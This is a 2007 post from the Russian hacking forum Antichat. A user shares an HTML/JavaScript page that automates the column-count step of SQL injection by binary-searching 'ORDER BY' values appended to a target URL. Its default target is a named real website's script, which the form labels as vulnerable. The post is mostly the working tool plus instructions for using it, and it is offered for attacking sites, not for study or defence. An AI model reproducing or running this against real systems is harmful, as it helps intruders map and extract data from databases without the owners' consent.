17.08.2007, 01:22
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
сделал с бинарным поиском...
полностю не тестил.. пару штук проверил вроде все ок..
вообщем вводите адрес вместес параметром
http://sololiteratura.com/php/autor.php?id=1
клацаете меньше пока не появится контент.. потом мона больше пока не появится ошибка.. вообщем там просто
PHP код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<META name="author" content="halkfild">
<META name="copyright" content="© 2007 halkfild">
<style>
body
{
padding:10px;
background:#2A2E33;
font-family:tahoma, verdana, arial;
font-size:14px;
text-align:center;
color:#B9B9BD;
}
form
{
padding:10px;
border:1px solid #666;
width:700px;
margin:0 auto;
}
iframe
{
padding:10px;
border:1px solid #666;
width:700px;
height:500px;
margin:0 auto;
}
input
{
vertical-align:middle;
margin:1px 0;
padding-right:10px;
border:1px solid #336600;
padding:2px;
background:#363940;
color:#B9B9BD;
}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Подборщик количества столбцов © halkfild</title>
</head>
<script>
var url="http://sololiteratura.com/php/autor.php?id=1"; //"http://";
var tek_url=url;
var k=0;
var LL; //left limit
var RL; //right limit
function poisk(f) {
tek_url=document.search.url.value;
LL=document.search.llc.value*1;
RL=document.search.rlc.value*1;
rgurl= document.search.rurl.value;
tek_url= tek_url + "+order+by+";
if (f==1) { //>
LL=LL+Math.floor((RL-LL)/2);
}
else { //<
RL=LL+Math.floor((RL-LL)/2);
}
k=Math.floor(LL+(RL-LL)/2);
tek_url= tek_url + k + rgurl;
document.search.llc.value=LL;
document.search.rlc.value=RL;
document.search.tek_url.value=tek_url;
changePage(tek_url);
}
function changePage(p) {
document.getElementById( "ifrm" ).src = p;
}
</script>
<form name=search method=post>
<label>Ведите путь к уязвимому скрипту<br>
<input name="url" value="http://sololiteratura.com/php/autor.php?id=1" style='width:388px;'>
<input name="rurl" value="/*&" style='width:200px;'>
</label><br>
<input onClick=poisk(1); type=button value="больше >" style='width:100px;'>
<input onClick=poisk(2); type=button value="меньше <" style='width:100px;'>
Границы поиска количества
<input size=5 name=llc value=0 style='width:96px;'><b>:</b><input size=5 name=rlc value=100 style='width:96px;'><br/>
адрессная строка(URL)<br/><input name=tek_url readonly style='width:600px;'><br/>
</form>
<body onload="changePage()"> <iframe id="ifrm" src="null"></body>
</html>
з.ы. завтра нормально потестю..
*
[+] добавлена возможность использования правой части URL вида http://site.com/script.php?parametr=1[inj]&bla=bla&bla1=bla&bla2=bla
Последний раз редактировалось halkfild; 17.08.2007 в 11:32..
|
|
|